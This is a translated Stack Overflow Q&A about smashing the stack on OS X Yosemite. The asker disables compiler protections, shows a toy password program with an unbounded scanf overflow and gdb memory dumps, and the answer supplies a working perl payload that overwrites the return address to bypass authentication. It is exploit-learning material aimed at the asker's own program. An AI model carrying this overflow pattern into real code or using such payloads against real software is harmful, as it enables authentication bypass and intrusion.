我很难弄清楚如何在OSX10.10.5(约塞米蒂)上禁用堆栈保护我一直在努力拼凑各种线程的gcc标志,但到目前为止还没有成功禁用保护我目前正在编译我的程序:

gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -fno-sanitize=address -D_FORTIFY_SOURCE=0 -Wl,-no_pie -o program program.c

但当我试图粉碎堆栈时,我就放弃了。
我曾在Red Hat Enterprise Linux Server 7.2(Maipo)上尝试过相同的程序,在适当地调整内存地址差异后,在使用以下命令编译后,粉碎堆栈没有问题:
gcc -g3 -std=c99 -pedantic -Wall -m32 -fno-stack-protector -o program program.c

同样值得注意的是,和大多数mac一样,我机器上的gcc是clang(Apple LLVM版本7.0.0(clang-700.0.72))的符号链接。
如何禁用优胜美地的堆栈保护?
其他详细信息
我使用的虚拟程序是:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int authenticate() {
  char password[10];
  printf("Enter password: ");
  scanf("%s", password);
  return strcmp(password, "1234567890") == 0;
}

void success() {
  printf("Access granted\n");
  exit(0);
}

void failure() {
  printf("Access denied\n");
  exit(1);
}

int main(int argc, char** argv) {
  if (authenticate()) {
    success();
  } else {
    failure();
  }
}

当我运行otool -tv program时,我注意到以下几点:
我要跳转到的success例程位于地址0x00001e70
我们通常在authenticate之后返回的指令位于0x00001efe地址。
当我输入虚拟密码“xxxxxxxxx”并用gdb检查缓冲区后运行x/30xb &password时,我观察到:
0xbffffc32: 0x78    0x78    0x78    0x78    0x78    0x78    0x78    0x78
0xbffffc3a: 0x78    0x78    0x00    0x00    0x00    0x00    0x00    0x00
0xbffffc42: 0x00    0x00    0xfc    0xfc    0xff    0xbf    0x68    0xfc
0xbffffc4a: 0xff    0xbf    0xfe    0x1e    0x00    0x00

我们想覆盖第27个0xfe字节。
当我试图按如下方式粉碎堆栈时:
printf "xxxxxxxxxxxxxxxxxxxxxxxxxx\x70" | ./program # 26 bytes of junk, followed by 0x70

我得到一个segfault。

最佳答案

OS X ABI要求从16字节对齐的堆栈发出系统调用(例如exit中的success调用)当你进入成功状态时,你会得到4个字节,因为堆栈上没有另一个返回地址(即,你应该call函数)
解决方法是跳转到更高堆栈帧中对success的调用跳到我的主要作品:

(gdb) disas main
Dump of assembler code for function main:
   0x00001ed0 <+0>: push   %ebp
   0x00001ed1 <+1>: mov    %esp,%ebp
   0x00001ed3 <+3>: sub    $0x18,%esp
   0x00001ed6 <+6>: mov    0xc(%ebp),%eax
   0x00001ed9 <+9>: mov    0x8(%ebp),%ecx
   0x00001edc <+12>:   movl   $0x0,-0x4(%ebp)
   0x00001ee3 <+19>:   mov    %ecx,-0x8(%ebp)
   0x00001ee6 <+22>:   mov    %eax,-0xc(%ebp)
   0x00001ee9 <+25>:   call   0x1df0 <authenticate>
   0x00001eee <+30>:   cmp    $0x0,%eax
   0x00001ef1 <+33>:   je     0x1f01 <main+49>

   0x00001ef7 <+39>:   call   0x1e60 <success>

   0x00001efc <+44>:   jmp    0x1f06 <main+54>
   0x00001f01 <+49>:   call   0x1e90 <failure>
   0x00001f06 <+54>:   mov    -0x4(%ebp),%eax
   0x00001f09 <+57>:   add    $0x18,%esp
   0x00001f0c <+60>:   pop    %ebp
   0x00001f0d <+61>:   ret

然后返回call 0x1ef7指令:
$ perl -e 'print "P"x26, "\xf7\x1e"' | ./stack
Enter password: Root access has been granted
$

关于c - 在OS X Yosemite上砸栈?,我们在Stack Overflow上找到一个类似的问题:https://stackoverflow.com/questions/36763711/

10-13 05:44